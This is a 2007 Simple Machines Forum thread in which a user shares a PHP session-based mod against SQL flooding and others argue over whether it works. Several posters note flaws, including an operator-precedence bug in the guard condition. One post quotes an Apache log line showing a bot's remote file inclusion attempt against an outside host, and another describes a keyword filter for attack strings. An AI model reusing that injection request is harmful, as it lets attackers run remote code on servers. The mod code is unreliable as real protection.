Simple Machines Community Forum

Hi i want share with all one of my new modifications in smf 1.1.4 its a protection for sql flood attacks


First create a new document called

Quoteantisqlflood.php

Second copy and paste this code


<?php
//AntiSqlFlood by kike([email protected])
//www.pixelsdream.com
//Esta obra está bajo una licencia de Creative Commons (http://creativecommons.org/licenses/by-nc-sa/2.5/es/)
session_start();
$tiempoespera = 30;
$session = "sqlfloodprotection";
if ( isset($_SESSION["{$session}"]) && ( $_SESSION["{$session}"] >= time() - $tiempoespera ) )
{
         exit("<center><img src='http://www.pixelsdream.com/antiflood.jpg' width='234' height='234' alt='antisqlflood by kike'/><b>Please, wait 30 seconds for made another query or action</b><br><b>Por favor, espera 30 segundos para realizar otra consulta o accion</b></br>Press <b><a href='index.php'>here</a></b> for return to index<br>Pulsa <b><a href='index.php'>aqui</a></b> para volver al indice<br><br><br>Sql Flood Protection for smf by Kike([email protected])<br>Developed by www.pixelsdream.com<br>Desarrollado por www.pixelsdream.com
<br>  
<br>  
<br>
 <a rel='license' href='http://creativecommons.org/licenses/by-nc-sa/2.5/es/'>
<img alt='Creative Commons License' style='border-width:0' src='http://creativecommons.org/images/public/somerights20.png' />
</a>
 </center>");
         return false;
}
$_SESSION["{$session}"] = time();
//AntiSqlFlood by kike([email protected])
//www.pixelsdream.com
//Esta obra está bajo una licencia de Creative Commons (http://creativecommons.org/licenses/by-nc-sa/2.5/es/)
?>


Next you need protect all of actions from index.php

find this line...

global $modSettings, $settings, $user_info, $board, $topic, $maintenance, $sourcedir;

and add before

//antidos protection by kike ([email protected])
if (isset($_GET['action']) && $_GET['action'] == 'search2' || $_GET['action'] == 'search'){
include 'antisqlflood.php';
}
if (isset($_GET['action']) && $_GET['action'] == 'login' || $_GET['action'] == 'login2'){
include 'antisqlflood.php';

}

That's all thanks for our attention and enjoy this modification

Nice but you might want to change the image link to your own.

Especially since
a) the first link is a warez site
b) the site is suspended by the isp. (no doubt for a) )

Thanks karlbenson for report i changed the image this works good.

P.D-Any SqlFlooders can't support cookies and sessions use cookies, one good idea is make connection with mysql for save all times and ips, if anyone want this last modification can sendme a mail([email protected]) and i can share my latest code

P.D2-karlbenson the site is suspended for abusive use of server(sql flood attack). Anybody has attacked my site and i maked this script for prevent new attacks

no offense, but the code is stupid and a waste of time, also cannot do what it claims.

have you tried the code? for my forum is too usefull adding some lines :D
you doesn't tried sql flood attack??

Ok... just read it.. it's rubbish.

E107 has some good anti-flood code, download and study that, then return

you haven't got any idea of what sql attacks im saying... ¬¬
in my forum works perfect you can test it, whats your forum for check your megahyperprotection? xD
your replies are the unique rubish of this post...
im studing php and mysql for 5 years ago, do you want teach me today? dont makes me laught please...
if yo want and know php and mysql modify my script and remplace sessions(cookies) for mysql querys and this script can be the best protection for sql attacks :)

pd-about E107 anti-flood code i dont know this can you tellme the url of this project please?

yes, you are right and I am wrong.
forgive me for doubting you, oh master!




























(LMAO)

.....@rummie : Your attitude wasn't appreciated and no one is interested in your stupid replies.
if you have a reason why it is stupid tell.....

And If I get this right, This is too prevent spamming SQL Queries. And this is for SMF NOT E107.

looks interesting, but can you explain the code ? In your antisqlflood.php you're testing the session var [fon=Courier New]sqlfloodprotection[/font] but when will this var to be set ?

cv;foreach <?php //Auto edit for SMF

I will download the E107 and check the floodprotection. I've also written an 'antihacker' script, because everyday hundreds of scriptkiddies wanted to find any securityleaks and tries to execute their bots on my site. ATM im checking every GET request, removing possible attack strings like SELECT, SCRIPT ... and compares the original GET with the replaced one. If its the same, everything went right. Otherwise you will get an error and banned by .htaccess for 60 mins. What do think about it? Is there any other way to figure out a possible hack attack ?

If people are running bots, its not to difficult to run the requests through a series of proxies.

Thus nullifying this script entirely.

I can think of a dozen ways to easily overload a forum, although for obvious reasons I wouldn't post them here.

would you like to try it at my website ? I could check the logfiles and maybe i can improve the script...

I wouldn't bother. It would be a waste of time, just think about it.

Your thinking that attacks come from 1 person.
When in fact it could be 10 or even a small botnet could amount to 100's.

Yes you're right but in the past there are almost single script kiddies who wants to inject some code. When a small botnet is attacking my site, all ips are getting banned after the first try. This script works fine atm but i just want to improve it to avoid the daily scriptkiddie-perl-script-code-injection ;)

I've never had a need for anything like this with smf.

At the end of the day the ONLY way to counter a ddos attack is by server firewalls and ip blocking.


*********.net - - [18/Dec/2007:10:37:42 +0100] "GET /smf/index.php?x=http://dd3str0y3r.vilabol.uol.com.br/sk4n/safeon.txt?? HTTP/1.1" 302 353 "-" "libwww-perl/5.79"


This kind of request fills out my apache log every day...and i just want a solution for all those who don't have a virtual or dedicated server like me. I just have webspace, can't install a firewall but still searching for a way to prevent code injections.

But thats not going to do anything into smf.

Actions are sanitized, escape, preg_matched, validated etc.

All you'll get there is an entry in your log. when in fact that user would simply have been redirected to the board index.

cv;foreach <?php //Auto edit for SMF

i've integrated the script into my smf so the user would see a "hacking attempt message" (index.php?action=error) and will be banned ;) But back to topic...im now reading something about sqlflood's

@ rummie : all you said is already done ;) I plan to deny perl scripts but atm i use it to gather information about the attacks

/ignore rummie (if you dont like its simple dont use it! do you want a demostration of a sql query flood in your forum after and before use my code??)

if somebody want the latest version of this modification pm or mail, i improved some parts in the source and now works with mysql, i dont received more sql query flood attacks with the last code.

if you want people to use your code, make it public domain or LGPL (and yes, improve it) and not this "Creative Commons/NON Commercial bull******"

i just wanted to know how it works...

cv;foreach <?php //Auto edit for SMF

i dont like repeat things...
IN MY FORUM WORKS GOOD!! :)

the work its same to this
http://scripts.ringsworld.com/development-tools/flood-protection/flood-protection.php.html

Quote from: pixelsdream on December 20, 2007, 02:46:19 PM
i dont like repeat things...
IN MY FORUM WORKS GOOD!! :)

the work its same to this
http://scripts.ringsworld.com/development-tools/flood-protection/flood-protection.php.html

That stupid code you linked to is dumber than yours!! :D lol!

[rant]Doesnt anybody even **** READ code anymore??? [/rant]


sigh

any lil thing that helps against attacks are welcome

I've been under heavy attack the past months... even changed to vbulletin (didn't help) so switched back to smf

The attack I had was a heavy SQL flood attack by multiple bots.

From what I have seen, those **** can crash any forum engine... having them even booted from their webhost... (yea even from lunarpages which is so close to smf)

I really hope SMF comes up with a decent solution against this issue.